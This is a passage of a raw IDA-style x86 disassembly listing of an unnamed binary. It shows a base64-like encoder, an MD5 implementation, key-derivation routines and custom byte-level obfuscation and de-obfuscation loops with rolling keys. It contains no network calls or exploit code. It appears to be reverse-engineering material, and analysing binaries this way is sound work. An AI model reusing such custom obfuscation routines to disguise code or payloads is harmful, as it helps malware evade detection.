mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
and eax, 3Fh
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_C]
mov al, byte_41A18C[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnz short loc_40EC83
jmp short loc_40EC88
; ---------------------------------------------------------------------------
loc_40EC83: ; CODE XREF: sub_40EB4E+131�j
jmp loc_40EB60
; ---------------------------------------------------------------------------
loc_40EC88: ; CODE XREF: sub_40EB4E+6F�j
; sub_40EB4E+DA�j ...
mov eax, [ebp+arg_4]
add eax, [ebp+var_C]
and byte ptr [eax], 0
mov eax, [ebp+var_C]
leave
retn
sub_40EB4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EC96 proc near ; CODE XREF: sub_40A9CF+2FA�p
; sub_40E618+FD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40ECB4
; ---------------------------------------------------------------------------
loc_40ECAD: ; CODE XREF: sub_40EC96+3A�j
; sub_40EC96+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40ECB4: ; CODE XREF: sub_40EC96+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short loc_40ECE6
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
movzx eax, byte_41E9B0[eax]
test eax, eax
jz short loc_40ECD2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECD2: ; CODE XREF: sub_40EC96+38�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 41h
jnz short loc_40ECE2
jmp short loc_40ECAD
; ---------------------------------------------------------------------------
loc_40ECE2: ; CODE XREF: sub_40EC96+48�j
xor eax, eax
jmp short locret_40ECE9
; ---------------------------------------------------------------------------
loc_40ECE6: ; CODE XREF: sub_40EC96+24�j
push 1
pop eax
locret_40ECE9: ; CODE XREF: sub_40EC96+4E�j
leave
retn
sub_40EC96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ECEB proc near ; CODE XREF: .text:004168EF�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EAB4
call sub_40F26E
pop ecx
pop ecx
lea eax, byte_41EAB4
push 10h
pop edx
loc_40ED29: ; CODE XREF: sub_40ECEB+46�j
mov cl, [eax]
rol cl, cl
mov [eax], cl
inc eax
dec edx
jnz short loc_40ED29
pop edi
pop esi
pop ebx
leave
retn
sub_40ECEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED38 proc near ; CODE XREF: sub_40A9CF+14�p
; .text:00411294�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
xor ecx, ecx
xor eax, eax
loc_40ED45: ; CODE XREF: sub_40ED38+2F�j
mov cl, [esi]
test ecx, ecx
jz short loc_40ED69
cmp ecx, 61h
jb short loc_40ED53
sub ecx, 20h
loc_40ED53: ; CODE XREF: sub_40ED38+16�j
and ecx, 7Fh
add eax, ecx
and ecx, 0Fh
mov cl, byte_41EAB4[ecx]
add eax, ecx
rol eax, 3
inc esi
jmp short loc_40ED45
; ---------------------------------------------------------------------------
loc_40ED69: ; CODE XREF: sub_40ED38+11�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40ED38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ED6E proc near ; CODE XREF: .text:004168FD�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset dword_41EAC8
call sub_40F26E
pop ecx
pop ecx
lea esi, dword_41EAC8
mov edi, esi
push 10h
pop ecx
loc_40EDAE: ; CODE XREF: sub_40ED6E+48�j
lodsb
xor al, 0AAh
add al, al
or al, 1
stosb
loop loc_40EDAE
pop edi
pop esi
pop ebx
leave
retn
sub_40ED6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EDBD proc near ; CODE XREF: sub_40EF29+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EDCE
; ---------------------------------------------------------------------------
loc_40EDC7: ; CODE XREF: sub_40EDBD+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EDCE: ; CODE XREF: sub_40EDBD+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EE71
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
sub al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EDC7
; ---------------------------------------------------------------------------
locret_40EE71: ; CODE XREF: sub_40EDBD+17�j
leave
retn
sub_40EDBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE73 proc near ; CODE XREF: sub_40EF41+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_40EE84
; ---------------------------------------------------------------------------
loc_40EE7D: ; CODE XREF: sub_40EE73+AF�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40EE84: ; CODE XREF: sub_40EE73+8�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jge locret_40EF27
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
sub al, 1
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_4]
cdq
push 10h
pop ecx
idiv ecx
shl edx, 2
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, dl
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
not eax
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov cl, [ecx]
xor cl, al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov [eax], cl
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_8]
movzx eax, byte ptr [eax+edx]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_8]
mov al, [eax]
add al, [ecx+edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
add al, 33h
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp loc_40EE7D
; ---------------------------------------------------------------------------
locret_40EF27: ; CODE XREF: sub_40EE73+17�j
leave
retn
sub_40EE73 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF29 proc near ; CODE XREF: sub_40A9CF+25D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EAC8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EDBD
add esp, 0Ch
pop ebp
retn
sub_40EF29 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF41 proc near ; CODE XREF: sub_40A9CF+380�p
; sub_40D871+7AD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_41EAC8
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40EE73
add esp, 0Ch
pop ebp
retn
sub_40EF41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EF59 proc near ; CODE XREF: sub_40A9CF+271�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
mov eax, [ebp+arg_0]
add eax, 4
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
call sub_410422
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, 4
mov [ebp+arg_0], eax
and [ebp+var_8], 0
jmp short loc_40EF91
; ---------------------------------------------------------------------------
loc_40EF8A: ; CODE XREF: sub_40EF59+7E�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40EF91: ; CODE XREF: sub_40EF59+2F�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40EFD9
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _lrotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EF8A
; ---------------------------------------------------------------------------
loc_40EFD9: ; CODE XREF: sub_40EF59+3E�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40EFE9
; ---------------------------------------------------------------------------
loc_40EFE2: ; CODE XREF: sub_40EF59+D4�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40EFE9: ; CODE XREF: sub_40EF59+87�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F02F
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
add al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
push 1
push [ebp+var_4]
call sub_416DF6 ; _lrotl
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
jmp short loc_40EFE2
; ---------------------------------------------------------------------------
loc_40F02F: ; CODE XREF: sub_40EF59+94�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
mov [eax-4], ecx
mov eax, [ebp+arg_4]
add eax, 4
leave
retn
sub_40EF59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F040 proc near ; CODE XREF: sub_40A9CF+366�p
; sub_40D871+792�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
push eax
mov eax, [ebp+arg_0]
add eax, 4
push eax
push [ebp+arg_0]
call sub_416E02 ; memmove
add esp, 0Ch
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
and [ebp+var_8], 0
jmp short loc_40F07C
; ---------------------------------------------------------------------------
loc_40F075: ; CODE XREF: sub_40F040+82�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_40F07C: ; CODE XREF: sub_40F040+33�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jge short loc_40F0C4
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _lrotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F075
; ---------------------------------------------------------------------------
loc_40F0C4: ; CODE XREF: sub_40F040+42�j
mov eax, [ebp+arg_4]
dec eax
mov [ebp+var_8], eax
jmp short loc_40F0D4
; ---------------------------------------------------------------------------
loc_40F0CD: ; CODE XREF: sub_40F040+D8�j
mov eax, [ebp+var_8]
dec eax
mov [ebp+var_8], eax
loc_40F0D4: ; CODE XREF: sub_40F040+8B�j
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_40F11A
mov eax, [ebp+var_4]
sub eax, [ebp+var_8]
mov [ebp+var_4], eax
push 1
push [ebp+var_4]
call sub_416DFC ; _lrotr
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
xor al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+arg_0]
add eax, [ebp+var_8]
mov al, [eax]
sub al, byte ptr [ebp+var_4]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_40F0CD
; ---------------------------------------------------------------------------
loc_40F11A: ; CODE XREF: sub_40F040+98�j
mov eax, [ebp+arg_4]
leave
retn
sub_40F040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F11F proc near ; CODE XREF: sub_40ECEB+D�p
; sub_40ED6E+D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 67452301h
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0EFCDAB89h
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 98BADCFEh
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 10325476h
mov eax, [ebp+arg_0]
and dword ptr [eax+10h], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+14h], 0
pop ebp
retn
sub_40F11F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F159 proc near ; CODE XREF: sub_40ECEB+1D�p
; sub_40ED6E+1D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*8]
mov ecx, [ebp+arg_0]
mov [ecx+10h], eax
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
cmp eax, [ebp+var_4]
jnb short loc_40F18E
mov eax, [ebp+arg_0]
mov eax, [eax+14h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+14h], eax
loc_40F18E: ; CODE XREF: sub_40F159+26�j
mov eax, [ebp+arg_8]
shr eax, 1Dh
mov ecx, [ebp+arg_0]
mov ecx, [ecx+14h]
add ecx, eax
mov eax, [ebp+arg_0]
mov [eax+14h], ecx
mov eax, [ebp+var_4]
shr eax, 3
and eax, 3Fh
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_40F21C
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
push 40h
pop eax
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_4]
jnb short loc_40F1E8
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
jmp locret_40F26C
; ---------------------------------------------------------------------------
loc_40F1E8: ; CODE XREF: sub_40F159+77�j
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 18h
push eax
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, [ebp+var_4]
mov [ebp+arg_8], eax
loc_40F21C: ; CODE XREF: sub_40F159+59�j
; sub_40F159+FC�j
cmp [ebp+arg_8], 40h
jb short loc_40F257
push 40h
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, 40h
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, 40h
mov [ebp+arg_8], eax
jmp short loc_40F21C
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F159+C7�j
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
locret_40F26C: ; CODE XREF: sub_40F159+8A�j
leave
retn
sub_40F159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F26E proc near ; CODE XREF: sub_40ECEB+2E�p
; sub_40ED6E+2E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
mov eax, [eax+10h]
shr eax, 3
and eax, 3Fh
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+18h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 80h
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 3Fh
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_8], eax
cmp [ebp+var_8], 8
jnb short loc_40F2E1
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 38h
push 0
mov eax, [ebp+arg_4]
add eax, 18h
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_40F2F5
; ---------------------------------------------------------------------------
loc_40F2E1: ; CODE XREF: sub_40F26E+3B�j
mov eax, [ebp+var_8]
sub eax, 8
push eax
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
loc_40F2F5: ; CODE XREF: sub_40F26E+71�j
push 8
mov eax, [ebp+arg_4]
add eax, 10h
push eax
mov eax, [ebp+arg_4]
add eax, 50h
push eax
call sub_40F33F
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 10h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F33F
add esp, 0Ch
push 4
push 0
push [ebp+arg_4]
call sub_416B6A ; memset
add esp, 0Ch
leave
retn
sub_40F26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F33F proc near ; CODE XREF: sub_40F26E+97�p
; sub_40F26E+B8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_40F35E
; ---------------------------------------------------------------------------
loc_40F34E: ; CODE XREF: sub_40F33F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_40F35E: ; CODE XREF: sub_40F33F+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_40F3CC
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 8
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+1], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 10h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+2], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 18h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+3], al
jmp short loc_40F34E
; ---------------------------------------------------------------------------
locret_40F3CC: ; CODE XREF: sub_40F33F+25�j
leave
retn
sub_40F33F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3CE proc near ; CODE XREF: sub_40F159+AA�p
; sub_40F159+E3�p ...
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_50]
push eax
call sub_410244
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-28955B88h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-173848AAh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+242070DBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3E423112h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0A83F051h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4787C62Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-57CFB9EDh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-2B96AFFh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+698098D8h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-74BB0851h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
